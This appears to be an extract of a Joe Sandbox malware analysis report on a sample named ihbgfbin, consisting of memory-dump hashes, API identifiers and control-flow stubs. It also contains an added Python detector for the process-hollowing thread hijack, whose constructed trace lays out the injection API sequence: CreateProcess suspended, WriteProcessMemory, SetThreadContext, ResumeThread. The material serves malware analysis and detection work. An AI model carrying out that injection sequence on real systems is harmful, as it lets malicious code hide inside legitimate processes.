                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.421811859.0000000000740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_740000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ResumeThread
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 947044025-0
                                                                                                                                                                                    • Opcode ID: a56c578c11147893173a634afa7d9d32ad7cc31851f3ac336f45cbb1d49e5f75
                                                                                                                                                                                    • Instruction ID: 20c90d4870591d0b0712e4dad9dee1b615b78cb20ec020ea8a869505e1c342c9
                                                                                                                                                                                    • Opcode Fuzzy Hash: a56c578c11147893173a634afa7d9d32ad7cc31851f3ac336f45cbb1d49e5f75
                                                                                                                                                                                    • Instruction Fuzzy Hash: B931CCB5D002489FCF14CFA9D884AEEFBB1AF49314F14946AE815B7310C739A946CFA4
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.421811859.0000000000740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_740000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ResumeThread
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 947044025-0
                                                                                                                                                                                    • Opcode ID: 837f219b6728fcde013bf3e737a97371eac9dbd3f4fc713871d196bddb624d78
                                                                                                                                                                                    • Instruction ID: 6140eec812d9471f850bc0fe068583e79b922bd59dde1fa513a59c5e4336affc
                                                                                                                                                                                    • Opcode Fuzzy Hash: 837f219b6728fcde013bf3e737a97371eac9dbd3f4fc713871d196bddb624d78
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A319AB4D002189FCF14CFA9D984AAEFBB5AF49314F24942AE815B7300D775A945CF94
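                                                                                                                                                                                     The functions above show the thread-hijack half of the hollowing chain the report attributes to process 5: Wow64SetThreadContext on a thread handle, then ResumeThread. The following is an added detection example, not part of the Joe Sandbox report; it parses a constructed API-call trace (the line format and the handle values are assumptions made for the example, not real sandbox output) and raises an alert when a SetThreadContext-family call is followed by ResumeThread on the same handle within the same process, with confidence raised if that process also called WriteProcessMemory earlier.

```python
"""Flag the SetThreadContext -> ResumeThread thread-hijack chain in an API trace.

Added example. The trace format ("<pid> <tid> <api>(<args>) -> <ret>") and the
sample lines below are constructed for illustration; they are not the sandbox's
own trace output.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# One call per line; arguments are comma-separated and contain no parentheses.
CALL_RE = re.compile(
    r"^(?P<pid>\d+)\s+(?P<tid>\d+)\s+(?P<api>\w+)\((?P<args>[^)]*)\)\s*->\s*(?P<ret>.*)$"
)

# APIs that rewrite a thread's register context (EIP/RIP) from another process.
CONTEXT_APIS = {"SetThreadContext", "Wow64SetThreadContext", "NtSetContextThread"}
# APIs that let a suspended thread run with the new context.
RESUME_APIS = {"ResumeThread", "NtResumeThread"}

# Constructed trace: process 5 stages a suspended child, writes into it, sets the
# main thread's context and resumes it; process 7 resumes a thread with no prior
# context change, which must not alert.
SAMPLE_TRACE = """\
5 1140 CreateProcessW("C:\\Windows\\SysWOW64\\svchost.exe", 0x4) -> pid=3320 hThread=0x1c4
5 1140 WriteProcessMemory(0x1c0, 0x400000, 0x2a000) -> 1
5 1140 Wow64SetThreadContext(0x1c4, 0x19f3c0) -> 1
5 1140 ResumeThread(0x1c4) -> 1
5 1140 CloseHandle(0x1c4) -> 1
7 2200 ResumeThread(0x2f8) -> 1
"""


@dataclass
class Call:
    pid: int
    tid: int
    api: str
    args: list[str]
    ret: str


def parse_trace(text: str) -> list[Call]:
    """Parse trace lines into Call records; lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = CALL_RE.match(line.strip())
        if not m:
            continue
        raw = m["args"].strip()
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(Call(int(m["pid"]), int(m["tid"]), m["api"], args, m["ret"].strip()))
    return calls


def find_hollowing(calls: list[Call]) -> list[dict]:
    """Return one alert per (pid, thread handle) where a context-setting call is
    later followed by a resume on the same handle in the same process."""
    alerts = []
    pending = {}          # (pid, handle) -> index of the context-setting call
    wrote_memory = set()  # pids that wrote into another process beforehand
    for i, c in enumerate(calls):
        if c.api == "WriteProcessMemory":
            wrote_memory.add(c.pid)
        elif c.api in CONTEXT_APIS and c.args:
            pending[(c.pid, c.args[0])] = i
        elif c.api in RESUME_APIS and c.args:
            key = (c.pid, c.args[0])
            if key in pending:
                alerts.append({
                    "pid": c.pid,
                    "thread_handle": c.args[0],
                    "context_api": calls[pending.pop(key)].api,
                    "confidence": "high" if c.pid in wrote_memory else "medium",
                })
    return alerts


if __name__ == "__main__":
    for alert in find_hollowing(parse_trace(SAMPLE_TRACE)):
        print(alert)
```

                                                                                                                                                                                     Keying on the thread handle rather than on the bare API pair keeps ordinary ResumeThread calls (a debugger, a thread pool) from alerting; a real trace should also carry the target pid from CreateProcess so the alert names the hollowed process.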
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.421727672.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_1b0000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                                                    • Opcode ID: 8f33deed09ec74439ffdbf318c32ac8f0dc2dd8077a6a846d5e077f9b6cc4cb7
                                                                                                                                                                                    • Instruction ID: 2b1eef5bb655aaf3b7e192f0d3f1265e580a7e2f4ef854ea736bb663048420eb
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f33deed09ec74439ffdbf318c32ac8f0dc2dd8077a6a846d5e077f9b6cc4cb7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D31BAB9D042189FCB10CFA9D884AEEFBF0AF49310F24905AE815B3310C774A945CF64
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.421727672.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_1b0000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                                                    • Opcode ID: 66856ecf97ac73d7bbb221a89bc86fe2741ea6bd3cbcd3925ede2af5f9109faf
                                                                                                                                                                                    • Instruction ID: 5021e93dd84f2e5ad9ffed7730719cfde155296f7be1ec023147d57827289b91
                                                                                                                                                                                    • Opcode Fuzzy Hash: 66856ecf97ac73d7bbb221a89bc86fe2741ea6bd3cbcd3925ede2af5f9109faf
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3A31AAB4D042189FCF10CFA9D984AEEFBF4AB4A314F24906AE915B7310D374A945CFA5
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.421666075.000000000016D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0016D000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_16d000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: ffe8962890f7812caf46fe3c5fae04a616390221a0c7ca249bf947d2a7967d87
                                                                                                                                                                                    • Instruction ID: edeaa936adcd964ca4f2a2f908b4e42476c67e96e4b020e8a94ae4133bf398c2
                                                                                                                                                                                    • Opcode Fuzzy Hash: ffe8962890f7812caf46fe3c5fae04a616390221a0c7ca249bf947d2a7967d87
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9421C2B5A04240EFDB15CF14E9D0B26BBA5FB84314F24C5ADE8494B256C336D85ACB61
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.421666075.000000000016D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0016D000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_16d000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 0ec48475966cffbcf21af511b4325280f7d5b206b0ccca5130688f379eaa7013
                                                                                                                                                                                    • Instruction ID: 7ad5fba05698fcee117c6953e84f88897ffb6b7fcfa625bd8efb3d14e5eee82a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ec48475966cffbcf21af511b4325280f7d5b206b0ccca5130688f379eaa7013
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1521B075A04240EFDB15CF14E884B26BB65EB84314F34C5A9E8494B246C736D857CBA1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.421666075.000000000016D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0016D000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_16d000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: d8f6b684a59049e0a2dc1e2a63ac764b6733c0b658a5d3c99be70f6e552dc11b
                                                                                                                                                                                    • Instruction ID: 315111a4de01c59cdbd2e149bae8089d9ff6c7dfebe28bc9b086e30af66c9fb6
                                                                                                                                                                                    • Opcode Fuzzy Hash: d8f6b684a59049e0a2dc1e2a63ac764b6733c0b658a5d3c99be70f6e552dc11b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 59218E755093808FDB02CF24D994B15BF71EB46314F28C5EAD8498F2A7C33AD81ACB62
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.421666075.000000000016D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0016D000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_16d000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                                                                                                                                                                    • Instruction ID: 141c25bf80f1b53d939537fe1ca140e7b9ed01256c9d9760bc90249b175f6750
                                                                                                                                                                                    • Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                                                                                                                                                                    • Instruction Fuzzy Hash: DF118B75A04280DFDB12CF14D9D4B25BBA1FB84314F28C6ADDC494B656C33AD85ACBA2
Strings
Memory Dump Source
• Source File: 00000005.00000002.421811859.0000000000740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_740000_ihbgfbin.jbxd
Similarity
• API ID:
• String ID: !x1f
• API String ID: 0-27585904
Strings
Memory Dump Source
• Source File: 00000005.00000002.421811859.0000000000740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_740000_ihbgfbin.jbxd
Similarity
• API ID:
• String ID: P,V
• API String ID: 0-683960525
Memory Dump Source
• Source File: 00000005.00000002.421727672.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1b0000_ihbgfbin.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000005.00000002.421727672.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1b0000_ihbgfbin.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000005.00000002.421727672.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1b0000_ihbgfbin.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000005.00000002.421811859.0000000000740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_740000_ihbgfbin.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000005.00000002.421811859.0000000000740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_740000_ihbgfbin.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000005.00000002.421811859.0000000000740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_740000_ihbgfbin.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000005.00000002.421727672.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1b0000_ihbgfbin.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000005.00000002.421727672.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1b0000_ihbgfbin.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Execution Graph

Execution Coverage: 0.3%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 6
Total number of Limit Nodes: 1
execution_graph 65704 db6c39 65705 db6c45 __except1 65704->65705 65707 dbee06 __vswprintf 65705->65707 65709 d5fea0 LdrInitializeThunk 65705->65709 65708 db6c66 __except1 65709->65708 65718 d5f900 LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
• Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                                                    • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846

Control-flow Graph: control_flow_graph 13 d60048-d6005d LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
• Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
• Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
• Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
• Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A

Control-flow Graph: control_flow_graph 14 d60078-d60090 LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
• Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
• Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
• Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
• Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B

Control-flow Graph: control_flow_graph 1 d5f9f0-d5fa05 LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
• Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
• Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
• Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
• Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A

Control-flow Graph: control_flow_graph 0 d5f900-d5f918 LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
• Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
• Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
• Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
• Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587

Control-flow Graph: control_flow_graph 2 d5fad0-d5fae5 LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
• Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
• Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
• Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
• Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 3 d5fae8-d5fafd LdrInitializeThunk
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                                                    • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                                                                                                                                    • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                                                    • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 5 d5fbb8-d5fbcd LdrInitializeThunk
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                                                    • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                                                    • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 4 d5fb68-d5fb7d LdrInitializeThunk
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
